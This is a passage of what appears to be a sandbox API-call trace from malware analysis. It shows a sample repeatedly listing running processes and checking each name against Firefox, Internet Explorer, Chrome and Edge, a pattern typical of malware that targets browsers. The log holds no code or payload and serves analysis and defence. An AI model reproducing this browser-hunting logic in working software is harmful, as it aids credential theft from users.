(lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0247.314] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0247.314] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0247.314] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0247.314] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0247.314] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0247.314] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0247.315] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0247.315] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0247.315] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0247.315] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0247.315] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0247.315] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="firefox.exe") returned -1 [0247.315] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="iexplore.exe") returned -1 [0247.315] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="chrome.exe") returned -1 [0247.315] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="microsoftedgecp.exe") returned -1 [0247.315] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0247.316] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="firefox.exe") returned -1 [0247.316] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="iexplore.exe") returned -1 [0247.316] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="chrome.exe") returned -1 [0247.316] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="microsoftedgecp.exe") returned -1 [0247.316] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0247.316] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="firefox.exe") returned 1 [0247.316] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="iexplore.exe") returned 1 [0247.316] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="chrome.exe") returned 1 [0247.316] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="microsoftedgecp.exe") returned 1 [0247.316] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0247.317] lstrcmpiA (lpString1="definitely.exe", lpString2="firefox.exe") returned -1 [0247.317] lstrcmpiA (lpString1="definitely.exe", lpString2="iexplore.exe") returned -1 [0247.317] lstrcmpiA (lpString1="definitely.exe", lpString2="chrome.exe") returned 1 [0247.317] lstrcmpiA (lpString1="definitely.exe", lpString2="microsoftedgecp.exe") returned -1 [0247.317] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0247.318] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="firefox.exe") returned 1 [0247.318] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="iexplore.exe") returned 1 [0247.318] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="chrome.exe") returned 1 [0247.318] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="microsoftedgecp.exe") returned -1 [0247.318] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0247.318] lstrcmpiA (lpString1="whenever.exe", lpString2="firefox.exe") returned 1 [0247.318] lstrcmpiA (lpString1="whenever.exe", lpString2="iexplore.exe") returned 1 [0247.318] lstrcmpiA (lpString1="whenever.exe", lpString2="chrome.exe") returned 1 [0247.318] lstrcmpiA (lpString1="whenever.exe", lpString2="microsoftedgecp.exe") returned 1 [0247.318] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0247.319] lstrcmpiA (lpString1="potentially.exe", lpString2="firefox.exe") returned 1 [0247.319] lstrcmpiA (lpString1="potentially.exe", lpString2="iexplore.exe") returned 1 [0247.319] lstrcmpiA (lpString1="potentially.exe", lpString2="chrome.exe") returned 1 [0247.319] lstrcmpiA (lpString1="potentially.exe", lpString2="microsoftedgecp.exe") returned 1 [0247.319] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0247.319] lstrcmpiA (lpString1="seeker.exe", lpString2="firefox.exe") returned 1 [0247.319] lstrcmpiA (lpString1="seeker.exe", lpString2="iexplore.exe") returned 1 [0247.319] lstrcmpiA (lpString1="seeker.exe", lpString2="chrome.exe") returned 1 [0247.319] lstrcmpiA (lpString1="seeker.exe", lpString2="microsoftedgecp.exe") returned 1 [0247.319] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0247.320] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="firefox.exe") returned 1 [0247.320] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="iexplore.exe") returned 1 [0247.320] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="chrome.exe") returned 1 [0247.320] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="microsoftedgecp.exe") returned 1 [0247.320] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0247.320] lstrcmpiA (lpString1="birth bean.exe", lpString2="firefox.exe") returned -1 [0247.320] lstrcmpiA (lpString1="birth bean.exe", lpString2="iexplore.exe") returned -1 [0247.320] lstrcmpiA (lpString1="birth bean.exe", lpString2="chrome.exe") returned -1 [0247.320] lstrcmpiA (lpString1="birth bean.exe", lpString2="microsoftedgecp.exe") returned -1 [0247.320] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0247.321] lstrcmpiA (lpString1="ruby.exe", lpString2="firefox.exe") returned 1 [0247.321] lstrcmpiA (lpString1="ruby.exe", lpString2="iexplore.exe") returned 1 [0247.321] lstrcmpiA (lpString1="ruby.exe", lpString2="chrome.exe") returned 1 [0247.321] lstrcmpiA (lpString1="ruby.exe", lpString2="microsoftedgecp.exe") returned 1 [0247.321] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0247.321] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="firefox.exe") returned 1 [0247.321] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="iexplore.exe") returned 1 [0247.321] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="chrome.exe") returned 1 [0247.321] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="microsoftedgecp.exe") returned 1 [0247.322] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0247.322] lstrcmpiA (lpString1="smith.exe", lpString2="firefox.exe") returned 1 [0247.322] lstrcmpiA (lpString1="smith.exe", lpString2="iexplore.exe") returned 1 [0247.322] lstrcmpiA (lpString1="smith.exe", lpString2="chrome.exe") returned 1 [0247.322] lstrcmpiA (lpString1="smith.exe", lpString2="microsoftedgecp.exe") returned 1 [0247.322] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0247.323] lstrcmpiA (lpString1="spicedespite.exe", lpString2="firefox.exe") returned 1 [0247.323] lstrcmpiA (lpString1="spicedespite.exe", lpString2="iexplore.exe") returned 1 [0247.323] lstrcmpiA (lpString1="spicedespite.exe", lpString2="chrome.exe") returned 1 [0247.323] lstrcmpiA (lpString1="spicedespite.exe", lpString2="microsoftedgecp.exe") returned 1 [0247.323] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0247.323] lstrcmpiA (lpString1="wooden.exe", lpString2="firefox.exe") returned 1 [0247.323] lstrcmpiA (lpString1="wooden.exe", lpString2="iexplore.exe") returned 1 [0247.323] lstrcmpiA (lpString1="wooden.exe", lpString2="chrome.exe") returned 1 [0247.323] lstrcmpiA (lpString1="wooden.exe", lpString2="microsoftedgecp.exe") returned 1 [0247.323] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0247.324] lstrcmpiA (lpString1="dallasr.exe", lpString2="firefox.exe") returned -1 [0247.324] lstrcmpiA (lpString1="dallasr.exe", lpString2="iexplore.exe") returned -1 [0247.324] lstrcmpiA (lpString1="dallasr.exe", lpString2="chrome.exe") returned 1 [0247.324] lstrcmpiA (lpString1="dallasr.exe", lpString2="microsoftedgecp.exe") returned -1 [0247.324] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0247.324] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="firefox.exe") returned -1 [0247.324] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="iexplore.exe") returned -1 [0247.324] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="chrome.exe") returned -1 [0247.324] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="microsoftedgecp.exe") returned -1 [0247.324] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0247.325] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="firefox.exe") returned -1 [0247.325] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="iexplore.exe") returned -1 [0247.325] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="chrome.exe") returned 1 [0247.325] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="microsoftedgecp.exe") returned -1 [0247.325] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0247.325] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="firefox.exe") returned 1 [0247.325] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="iexplore.exe") returned 1 [0247.325] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="chrome.exe") returned 1 [0247.325] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="microsoftedgecp.exe") returned 1 [0247.325] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0247.326] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="firefox.exe") returned -1 [0247.326] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="iexplore.exe") returned -1 [0247.326] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="chrome.exe") returned 1 [0247.326] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="microsoftedgecp.exe") returned -1 [0247.326] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0247.326] lstrcmpiA (lpString1="population openings.exe", lpString2="firefox.exe") returned 1 [0247.326] lstrcmpiA (lpString1="population openings.exe", lpString2="iexplore.exe") returned 1 [0247.326] lstrcmpiA (lpString1="population openings.exe", lpString2="chrome.exe") returned 1 [0247.327] lstrcmpiA (lpString1="population openings.exe", lpString2="microsoftedgecp.exe") returned 1 [0247.327] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0247.327] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0247.327] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0247.327] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0247.327] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0247.327] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0247.328] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0247.328] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0247.328] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0247.328] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0247.328] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0247.328] lstrcmpiA (lpString1="sppsvc.exe", lpString2="firefox.exe") returned 1 [0247.328] lstrcmpiA (lpString1="sppsvc.exe", lpString2="iexplore.exe") returned 1 [0247.328] lstrcmpiA (lpString1="sppsvc.exe", lpString2="chrome.exe") returned 1 [0247.328] lstrcmpiA (lpString1="sppsvc.exe", lpString2="microsoftedgecp.exe") returned 1 [0247.328] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0247.329] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0247.329] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0247.329] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0247.329] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0247.329] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0247.329] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0247.329] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0247.329] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0247.329] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0247.329] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0247.330] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0247.330] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0247.330] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0247.330] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0247.330] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0247.330] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0247.330] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0247.330] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0247.330] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0247.330] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0247.355] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0247.355] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0247.355] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0247.355] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0247.355] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0247.355] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0247.355] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0247.356] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0247.356] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0247.356] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0247.356] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0247.356] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0247.356] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0247.356] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0247.356] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0247.357] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0247.357] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0247.357] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0247.357] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0247.357] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0247.357] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0247.357] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0247.357] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0247.357] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0247.357] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 0 [0247.358] CloseHandle (hObject=0xd4) returned 1 [0247.358] Sleep (dwMilliseconds=0x3e8) [0248.385] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xd4 [0248.387] Process32First (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0248.387] lstrcmpiA (lpString1="[System Process]", lpString2="firefox.exe") returned -1 [0248.387] lstrcmpiA (lpString1="[System Process]", lpString2="iexplore.exe") returned -1 [0248.387] lstrcmpiA (lpString1="[System Process]", lpString2="chrome.exe") returned -1 [0248.387] lstrcmpiA (lpString1="[System Process]", lpString2="microsoftedgecp.exe") returned -1 [0248.387] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0248.388] lstrcmpiA (lpString1="System", lpString2="firefox.exe") returned 1 [0248.388] lstrcmpiA (lpString1="System", lpString2="iexplore.exe") returned 1 [0248.388] lstrcmpiA (lpString1="System", lpString2="chrome.exe") returned 1 [0248.388] lstrcmpiA (lpString1="System", lpString2="microsoftedgecp.exe") returned 1 [0248.388] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0248.388] lstrcmpiA (lpString1="smss.exe", lpString2="firefox.exe") returned 1 [0248.389] lstrcmpiA (lpString1="smss.exe", lpString2="iexplore.exe") returned 1 [0248.389] lstrcmpiA (lpString1="smss.exe", lpString2="chrome.exe") returned 1 [0248.389] lstrcmpiA (lpString1="smss.exe", lpString2="microsoftedgecp.exe") returned 1 [0248.389] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0248.389] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0248.389] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0248.389] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0248.389] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0248.389] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0248.390] lstrcmpiA (lpString1="wininit.exe", lpString2="firefox.exe") returned 1 [0248.390] lstrcmpiA (lpString1="wininit.exe", 